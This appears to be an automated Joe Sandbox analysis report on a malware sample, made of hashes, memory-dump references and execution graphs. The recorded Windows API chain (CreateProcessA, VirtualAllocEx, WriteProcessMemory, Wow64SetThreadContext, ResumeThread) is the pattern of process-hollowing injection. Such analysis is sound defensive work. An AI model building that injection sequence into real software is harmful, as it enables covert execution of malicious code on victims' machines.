                                                • Instruction Fuzzy Hash: 4F4118B0E0021ADFCB04CFAAD4815EEFBF6BF89340F50D06AD429A7200E7349A428F54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07721441 Relevance: .1, Instructions: 96COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 715e542c0359ad287d5d77d091473afed0c581f6dabc2cac8cc2aa6c39f229e9
                                                • Instruction ID: dc12aedba74b0e9c825c73116bd173d2aa559d35248ff0ec37a99bc31b23b752
                                                • Opcode Fuzzy Hash: 715e542c0359ad287d5d77d091473afed0c581f6dabc2cac8cc2aa6c39f229e9
                                                • Instruction Fuzzy Hash: 16413BB0E0421ADFCB04CFAAC4815AEFBF2BF89350F24D56AD429A7244D7349642CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E09D0 Relevance: 41.7, Strings: 33, Instructions: 440COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                • API String ID: 0-2697097662
                                                • Opcode ID: e0abf9a0990fdd63153b8d81629cd06904339d0338bc61162bdaa8e927a9f6ea
                                                • Instruction ID: fe2d155c7016ef7ab755164495fc4900d3f1557be49267b4b1a5ac502f02dbf2
                                                • Opcode Fuzzy Hash: e0abf9a0990fdd63153b8d81629cd06904339d0338bc61162bdaa8e927a9f6ea
                                                • Instruction Fuzzy Hash: 56121870E0121A8FCB18EF75F89569DB7B2FF44304F5089A8D009AB369DF746989CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 052E09E0 Relevance: 41.7, Strings: 33, Instructions: 434COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                • API String ID: 0-2697097662
                                                • Opcode ID: cfe1fbe72762308b654771496b00a70861cc89e69cbe9998fb5f31c8f21bc947
                                                • Instruction ID: c2d076643aef5e7e6556fe4999db54349590f80913b3e27cbfc0f9fa413dd240
                                                • Opcode Fuzzy Hash: cfe1fbe72762308b654771496b00a70861cc89e69cbe9998fb5f31c8f21bc947
                                                • Instruction Fuzzy Hash: 41121770E0121A8FCB18EF75F89569DB7B2FF44304F5089A8D009AB369DF746989CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:8.9%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:84
                                                Total number of Limit Nodes:5
                                                execution_graph 42031 2b9d378 42032 2b9d3be GetCurrentProcess 42031->42032 42034 2b9d409 42032->42034 42035 2b9d410 GetCurrentThread 42032->42035 42034->42035 42036 2b9d44d GetCurrentProcess 42035->42036 42037 2b9d446 42035->42037 42038 2b9d483 42036->42038 42037->42036 42039 2b9d4ab GetCurrentThreadId 42038->42039 42040 2b9d4dc 42039->42040 42076 2b94668 42077 2b94672 42076->42077 42079 2b94758 42076->42079 42080 2b9477d 42079->42080 42084 2b94859 42080->42084 42088 2b94868 42080->42088 42086 2b9488f 42084->42086 42085 2b9496c 42085->42085 42086->42085 42092 2b944e4 42086->42092 42089 2b9488f 42088->42089 42090 2b9496c 42089->42090 42091 2b944e4 CreateActCtxA 42089->42091 42091->42090 42093 2b958f8 CreateActCtxA 42092->42093 42095 2b959bb 42093->42095 42095->42095 42041 722f7a0 42042 722f7e0 VirtualAllocEx 42041->42042 42044 722f81d 42042->42044 42045 722f860 42046 722f8a8 WriteProcessMemory 42045->42046 42048 722f8ff 42046->42048 42122 722f950 42123 722f99b ReadProcessMemory 42122->42123 42125 722f9df 42123->42125 42096 585d320 42097 585d393 42096->42097 42101 5857ba0 42097->42101 42108 5857b9a 42097->42108 42098 585da9c 42102 5857bc4 42101->42102 42103 5857bcb 42101->42103 42102->42098 42107 5857bf2 42103->42107 42114 585647c 42103->42114 42106 585647c GetCurrentThreadId 42106->42107 42107->42098 42109 5857ba0 42108->42109 42110 585647c GetCurrentThreadId 42109->42110 42113 5857bc4 42109->42113 42111 5857be8 42110->42111 42112 585647c GetCurrentThreadId 42111->42112 42112->42113 42113->42098 42115 5856487 42114->42115 42116 5857f0f GetCurrentThreadId 42115->42116 42117 5857be8 42115->42117 42116->42117 42117->42106 42126 5857b70 42128 5857ba0 GetCurrentThreadId 42126->42128 42129 5857b9a GetCurrentThreadId 42126->42129 42127 5857b86 42128->42127 42129->42127 42049 2b9abf0 42052 2b9ace8 42049->42052 42050 2b9abff 42053 2b9acf9 42052->42053 42054 2b9ad1c 42052->42054 42053->42054 42060 2b9af80 42053->42060 42064 2b9af70 42053->42064 42054->42050 42055 2b9ad14 42055->42054 42056 2b9af20 GetModuleHandleW 42055->42056 42057 2b9af4d 42056->42057 42057->42050 42061 2b9af94 42060->42061 42063 2b9afb9 42061->42063 42068 2b9a0a8 42061->42068 42063->42055 42065 2b9af94 42064->42065 42066 2b9afb9 42065->42066 42067 2b9a0a8 LoadLibraryExW 42065->42067 42066->42055 42067->42066 42069 2b9b160 LoadLibraryExW 42068->42069 42071 2b9b1d9 42069->42071 42071->42063 42130 2b9d5c0 DuplicateHandle 42131 2b9d656 42130->42131 42072 722fae8 42073 722fb71 42072->42073 42073->42073 42074 722fcd6 CreateProcessA 42073->42074 42075 722fd33 42074->42075 42118 722f6c8 42119 722f70d Wow64SetThreadContext 42118->42119 42121 722f755 42119->42121 42132 722f618 42133 722f658 ResumeThread 42132->42133 42135 722f689 42133->42135

                                                Executed Functions

                                                Function 02B9D368 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 466 2b9d368-2b9d407 GetCurrentProcess 470 2b9d409-2b9d40f 466->470 471 2b9d410-2b9d444 GetCurrentThread 466->471 470->471 472 2b9d44d-2b9d481 GetCurrentProcess 471->472 473 2b9d446-2b9d44c 471->473 475 2b9d48a-2b9d4a5 call 2b9d547 472->475 476 2b9d483-2b9d489 472->476 473->472 479 2b9d4ab-2b9d4da GetCurrentThreadId 475->479 476->475 480 2b9d4dc-2b9d4e2 479->480 481 2b9d4e3-2b9d545 479->481 480->481
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 02B9D3F6
                                                • GetCurrentThread.KERNEL32 ref: 02B9D433
                                                • GetCurrentProcess.KERNEL32 ref: 02B9D470
                                                • GetCurrentThreadId.KERNEL32 ref: 02B9D4C9
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: cc06dfc85dcbbc29ab0cb3ef5e2bf5a2073dae469b5416e9fb3187d2415ba9fb
                                                • Instruction ID: 41c9212dfc0a46073915f9b8242858d4b6cf9b26e0a203f426965534c896e6f9
                                                • Opcode Fuzzy Hash: cc06dfc85dcbbc29ab0cb3ef5e2bf5a2073dae469b5416e9fb3187d2415ba9fb
                                                • Instruction Fuzzy Hash: E45168B09102098FDB14DFAAD5487DEBBF1AF49304F24C469E019A73A1DB749984CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02B9D378 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 488 2b9d378-2b9d407 GetCurrentProcess 492 2b9d409-2b9d40f 488->492 493 2b9d410-2b9d444 GetCurrentThread 488->493 492->493 494 2b9d44d-2b9d481 GetCurrentProcess 493->494 495 2b9d446-2b9d44c 493->495 497 2b9d48a-2b9d4a5 call 2b9d547 494->497 498 2b9d483-2b9d489 494->498 495->494 501 2b9d4ab-2b9d4da GetCurrentThreadId 497->501 498->497 502 2b9d4dc-2b9d4e2 501->502 503 2b9d4e3-2b9d545 501->503 502->503
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 02B9D3F6
                                                • GetCurrentThread.KERNEL32 ref: 02B9D433
                                                • GetCurrentProcess.KERNEL32 ref: 02B9D470
                                                • GetCurrentThreadId.KERNEL32 ref: 02B9D4C9
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 991cd8c50542cba85cace2b2ecfdf26707cb36c1fd1429f0fae6236e1540fd89
                                                • Instruction ID: 83b1578d071156d1fdb230c3717be283e2287ae1641a5a616ea2d4303ab19823
                                                • Opcode Fuzzy Hash: 991cd8c50542cba85cace2b2ecfdf26707cb36c1fd1429f0fae6236e1540fd89
                                                • Instruction Fuzzy Hash: 305138B09102098FDB14DFAAD548BDEBBF1EF49304F24C469E019A73A0DB74A984CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0722FADD Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0722FD1E
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: d7452d2ab8154c7b93d415b10f062e6fd81397a0f3cb53c9d5b17de6e2a5cc7e
                                                • Instruction ID: 7a61e53726aec934717100623bd7b021853d01b8e04fae2b53766a424709e834
                                                • Opcode Fuzzy Hash: d7452d2ab8154c7b93d415b10f062e6fd81397a0f3cb53c9d5b17de6e2a5cc7e
                                                • Instruction Fuzzy Hash: 30A1AFB1D1022ADFDF10CF68C9417DDBBB2BF49310F1485A9E808A7250DB749982DF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0722FAE8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0722FD1E
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: e3f1969584c68ff1c312c607d02acd5072de9d54f0df17e8cb91b391ceedbc4b
                                                • Instruction ID: 26aef13ac96003c407a2e376b5714996dcc89a4f90a8eb6e1ebf663340ed68f3
                                                • Opcode Fuzzy Hash: e3f1969584c68ff1c312c607d02acd5072de9d54f0df17e8cb91b391ceedbc4b
                                                • Instruction Fuzzy Hash: 8D918EB1D1022ADFDB10CF68C9417EDBBB6BF49310F1485A9E808A7250DB749986DF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02B9ACE8 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02B9AF3E
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: b43534a2e36f4aa9f74e8cf13687fbcfd01a9734515b5580b89510806bb62527
                                                • Instruction ID: 120744bc0350963f797ca9fed621da82d14dce569efc711e98987d40e637449d
                                                • Opcode Fuzzy Hash: b43534a2e36f4aa9f74e8cf13687fbcfd01a9734515b5580b89510806bb62527
                                                • Instruction Fuzzy Hash: E07143B0A00B058FDB24DF2AD54475ABBF5FF88304F108A6DD48ADBA50DB35E945CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02B944E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 02B959A9
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 55882d5ba8eda23aa2236b72fd01a1f4747f0a7f5cec364526f5227627e378ce
                                                • Instruction ID: 56b6557ffb4c8cbb91de23a90d82f0490a40c68a24f34727a5bf1831616ebd57
                                                • Opcode Fuzzy Hash: 55882d5ba8eda23aa2236b72fd01a1f4747f0a7f5cec364526f5227627e378ce
                                                • Instruction Fuzzy Hash: BE41D4B0C0071DCFDB24DFA9C884B9EBBB5BF49304F6080AAD419AB255DB756945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02B958EC Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 02B959A9
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 231c197af0edd180452c2d652053d3f211f8bcd5e51befd4fa4856f5ae3d2d02
                                                • Instruction ID: 027777855c7a3341831faa42bb77d61e4cb1e7746eb5c3f34a96e27b363fcfe1
                                                • Opcode Fuzzy Hash: 231c197af0edd180452c2d652053d3f211f8bcd5e51befd4fa4856f5ae3d2d02
                                                • Instruction Fuzzy Hash: FC4104B1C00719CFDB24CFA9C984BDDBBB5BF48304F2480AAD418AB255DB75694ACF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0722F859 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0722F8F0
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 819bc6cd72b8f8141106a230417113eaaf58bf1f786beb4a43f8ab395bab2348
                                                • Instruction ID: 7e37d30a753d426594577b2a0216a4714ec863b59d464dbf35bee4a8adab51bb
                                                • Opcode Fuzzy Hash: 819bc6cd72b8f8141106a230417113eaaf58bf1f786beb4a43f8ab395bab2348
                                                • Instruction Fuzzy Hash: A32146B29003599FCB10CFA9C885BDEBBF4FF48310F10842AE959A7250C7789955DBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0722F860 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0722F8F0
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 61958cdce78479f93d4eea1cdb4e48a62ada9d8e38497350b3e8992d233c7332
                                                • Instruction ID: 0ac18c53901c2e3c443150db85d9eb4a68059a2e560dd996e800a1d328e928f9
                                                • Opcode Fuzzy Hash: 61958cdce78479f93d4eea1cdb4e48a62ada9d8e38497350b3e8992d233c7332
                                                • Instruction Fuzzy Hash: 062155B2D003599FCB10CFA9C885BDEBBF4FF48310F10842AE959A7250CB789955DBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0722F948 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0722F9D0
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: a13eb967242f76c2bb97a0d0c43abe97e78d9c09da28d1a1ea42c7044ce47c6a
                                                • Instruction ID: f92da183e2afbd615bb1b0ebd92efb00e6e7b9186ff9e316d7befd6fd30b8d25
                                                • Opcode Fuzzy Hash: a13eb967242f76c2bb97a0d0c43abe97e78d9c09da28d1a1ea42c7044ce47c6a
                                                • Instruction Fuzzy Hash: C22136B1C002599FCB10DFAAC881ADEFBF5FF48310F20842AE558A7250C734A941DBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0722F6C2 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0722F746
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 368a71fdb0c15a1475f0b5128dda728d91d6881da4b756e48086314650a882a5
                                                • Instruction ID: 0d313afd1e27ca5ae8c56166cad2a0c84227a97a20f9f8621c462c38c812a808
                                                • Opcode Fuzzy Hash: 368a71fdb0c15a1475f0b5128dda728d91d6881da4b756e48086314650a882a5
                                                • Instruction Fuzzy Hash: 962157B1D003199FDB10DFAAC4857EEBBF4EF48324F10842AD459A7240CB789985CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0722F6C8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0722F746
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 2c2e3630d72e4cd576fc341270c1d0a08f5ff678b3920a5e7aa7cd80fe3c5818
                                                • Instruction ID: 096a36d6c152a2953fa1d04b64549cb01ec8c9ebd5919b44681db1a3f7201192
                                                • Opcode Fuzzy Hash: 2c2e3630d72e4cd576fc341270c1d0a08f5ff678b3920a5e7aa7cd80fe3c5818
                                                • Instruction Fuzzy Hash: 992149B1D003199FDB10DFAAC5857EEBBF4EF48324F108429D459A7240CB789945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0722F950 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0722F9D0
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 29d3ccedb56e31717b0897853936ce408b7749a9248fca34e62dd2d1b4f37dc8
                                                • Instruction ID: 2e1cf3e2a5fb5876e96a74afd278092df80547cfad1d8eecacf74e1cd0513f38
                                                • Opcode Fuzzy Hash: 29d3ccedb56e31717b0897853936ce408b7749a9248fca34e62dd2d1b4f37dc8
                                                • Instruction Fuzzy Hash: B62148B1C002599FCB10DFAAC841ADEFBF4FF48310F10842AE558A7250C7349941DBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02B9D5B8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B9D647
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 68a373771aa6b284b99c7f1141454abba55ab9fa0836a969825e986853eef2d3
                                                • Instruction ID: 68477028d2223df7cacada96303493d25e3df3f6396b812799825b20ae001887
                                                • Opcode Fuzzy Hash: 68a373771aa6b284b99c7f1141454abba55ab9fa0836a969825e986853eef2d3
                                                • Instruction Fuzzy Hash: 4721F3B6D00219DFDB10CFAAD984ADEBBF4FB48320F14845AE918A3351D378A940CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02B9D5C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B9D647
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: a2a7993e052a5da274c2a556ae5db5dbbabf6684a505b75cc85aa211676b1733
                                                • Instruction ID: 5c34c32e27929b68276cd3ea6a64c7ea7c64248665760de1732bd51c8cb50af8
                                                • Opcode Fuzzy Hash: a2a7993e052a5da274c2a556ae5db5dbbabf6684a505b75cc85aa211676b1733
                                                • Instruction Fuzzy Hash: 5621E4B59002099FDB10CF9AD984ADEBBF4EB48310F14805AE918A3350C374A940CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0722F799 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0722F80E
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 283dcac2f39d4a20ba4421c64ae68e288f71892d8085f32074e02b52d4b79bb7
                                                • Instruction ID: b91418c941fda89a5d1ee1afa574e83f089046baee2258b1c4e69e4f5156fbf4
                                                • Opcode Fuzzy Hash: 283dcac2f39d4a20ba4421c64ae68e288f71892d8085f32074e02b52d4b79bb7
                                                • Instruction Fuzzy Hash: 5F1167B18002499FCB10DFAAC844ADEFFF5EB48324F108829E459A7250CB35A941DFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02B9A0A8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B9AFB9,00000800,00000000,00000000), ref: 02B9B1CA
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: d9facfbd6a9b71fd6e5c0a8492ca62d7925a6a96f0e3c9e4ca62550cbb5dc92b
                                                • Instruction ID: daed897d343d5e7e2588d24515fb0386135a7bc9a1b7dee303e367516b110c20
                                                • Opcode Fuzzy Hash: d9facfbd6a9b71fd6e5c0a8492ca62d7925a6a96f0e3c9e4ca62550cbb5dc92b
                                                • Instruction Fuzzy Hash: 8F1114B69003198FDB10CF9AD848ADEFBF4EB48314F10846AE419A7210C375A585CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0722F7A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0722F80E
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: d0f4ca48b0c716ff5a6c99cdce1999063fd8b16a915a1025daef74e982d4372d
                                                • Instruction ID: 1f2d787f0d309b454c36ae3046a59328064d54e93fbb7c293d0c2454416b9126
                                                • Opcode Fuzzy Hash: d0f4ca48b0c716ff5a6c99cdce1999063fd8b16a915a1025daef74e982d4372d
                                                • Instruction Fuzzy Hash: B61156B18002499FCB10DFAAC844ADFFBF5EB88320F108819E519A7250CB75A940CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02B9B159 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B9AFB9,00000800,00000000,00000000), ref: 02B9B1CA
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 957b4edf3c5d1cb35b22e6e686903e15641c8be52150a3b013e19792bf95d682
                                                • Instruction ID: cba7d3de03e27cf07d15dd29396c769c594b2e54722b20a288bfd39597ba35e8
                                                • Opcode Fuzzy Hash: 957b4edf3c5d1cb35b22e6e686903e15641c8be52150a3b013e19792bf95d682
